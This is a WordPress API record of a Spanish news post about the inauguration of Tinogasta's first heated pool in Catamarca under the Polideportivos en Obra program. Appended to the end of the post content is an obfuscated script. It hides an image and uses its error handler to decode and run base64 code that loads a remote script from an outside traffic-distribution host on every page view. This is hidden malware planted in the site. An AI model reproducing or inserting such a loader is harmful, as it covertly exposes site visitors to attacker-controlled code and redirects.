{"id":5536,"date":"2022-07-18T11:21:10","date_gmt":"2022-07-18T14:21:10","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5536"},"modified":"2025-08-13T16:16:33","modified_gmt":"2025-08-13T19:16:33","slug":"primer-natatorio-climatizado-en-tinogasta","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5536","title":{"rendered":"Primer natatorio climatizado en Tinogasta"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"166\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/unnamed-1-1024x166.jpg\" alt=\"\" class=\"wp-image-5506\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/unnamed-1-1024x166.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/unnamed-1-300x48.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/unnamed-1-768x124.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/unnamed-1-1536x248.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/unnamed-1-2048x331.jpg 2048w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/unnamed-1-696x112.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/unnamed-1-1068x173.jpg 1068w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<h2 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#33383c\"><em>En el marco del programa Polideportivos en Obra<\/em><\/h2>\n\n\n\n<p>El gobernador&nbsp;<strong>Ra\u00fal Jalil<\/strong>, el intendente&nbsp;<strong>Sebasti\u00e1n Noblega<\/strong>&nbsp;y el subsecretario&nbsp;<strong>Sergio Palmas<\/strong>&nbsp;inauguraron el&nbsp;<strong>natatorio del Polideportivo El Gigante<\/strong>, primero climatizado en la ciudad de&nbsp;<strong>Tinogasta<\/strong>, provincia de Catamarca.<\/p>\n\n\n\n<p>\u00ab<em>Estamos convencidos de que todas las comunidades de la provincia deben tener las mismas oportunidades, sin importar d\u00f3nde vivan<\/em>\u00ab, asegur\u00f3 el gobernador desde el complejo de piletas, que cuenta con una&nbsp;<strong>semiol\u00edmpica climatizada con capacidad de 680 mil litros que recircular\u00e1<\/strong>, evitando el derroche.<\/p>\n\n\n\n<p>\u00ab<em>Esta obra, un sue\u00f1o esperado hace mucho tiempo por el pueblo tinogaste\u00f1o, fue posible gracias al trabajo articulado entre el Gobierno Nacional, el Provincial y el Municipal<\/em>\u00ab, agreg\u00f3 Palmas durante la visita a Catamarca, que tambi\u00e9n incluy\u00f3 una recorrida por el club&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/noticias\/lammens-en-catamarca-el-turismo-es-el-sector-mas-dinamico-en-la-generacion-de-empleo-en\" target=\"_blank\" rel=\"noreferrer noopener\">Juventud Unida junto al ministro Mat\u00edas Lammens<\/a>.<\/p>\n\n\n\n<p>Mediante el programa&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/polideportivos-en-obra\" target=\"_blank\" rel=\"noreferrer noopener\">Polideportivos en Obra<\/a>, el Ministerio de Turismo y Deportes de la Naci\u00f3n est\u00e1 llevando adelante mejoras de infraestructura en&nbsp;<strong>m\u00e1s de 150 espacios p\u00fablicos de todo el pa\u00eds<\/strong>, con una&nbsp;<strong>inversi\u00f3n superior a los $2100 millones<\/strong>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/primer-natatorio-climatizado-en-tinogasta#:~:text=El%20gobernador%20Ra%C3%BAl%20Jalil%2C%20el%20intendente%20Sebasti%C3%A1n%20Noblega,en%20la%20ciudad%20de%20Tinogasta%2C%20provincia%20de%20Catamarca.\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"630\" height=\"92\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Captura-web_26-6-2022_203038_www.argentina.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-5537\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Captura-web_26-6-2022_203038_www.argentina.gob_.ar_.jpeg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Captura-web_26-6-2022_203038_www.argentina.gob_.ar_-300x44.jpeg 300w\" sizes=\"(max-width: 630px) 100vw, 630px\" \/><\/a><\/figure>\n<\/div><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco del programa Polideportivos en Obra El gobernador&nbsp;Ra\u00fal Jalil, el intendente&nbsp;Sebasti\u00e1n Noblega&nbsp;y el subsecretario&nbsp;Sergio Palmas&nbsp;inauguraron el&nbsp;natatorio del Polideportivo El Gigante, primero climatizado en la ciudad de&nbsp;Tinogasta, provincia de Catamarca. \u00abEstamos convencidos de que todas las comunidades de la provincia deben tener las mismas oportunidades, sin importar d\u00f3nde vivan\u00ab, asegur\u00f3 el gobernador desde el [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5538,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-5536","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cuyo"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5536","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5536"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5536\/revisions"}],"predecessor-version":[{"id":10627,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5536\/revisions\/10627"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5538"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5536"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5536"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5536"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}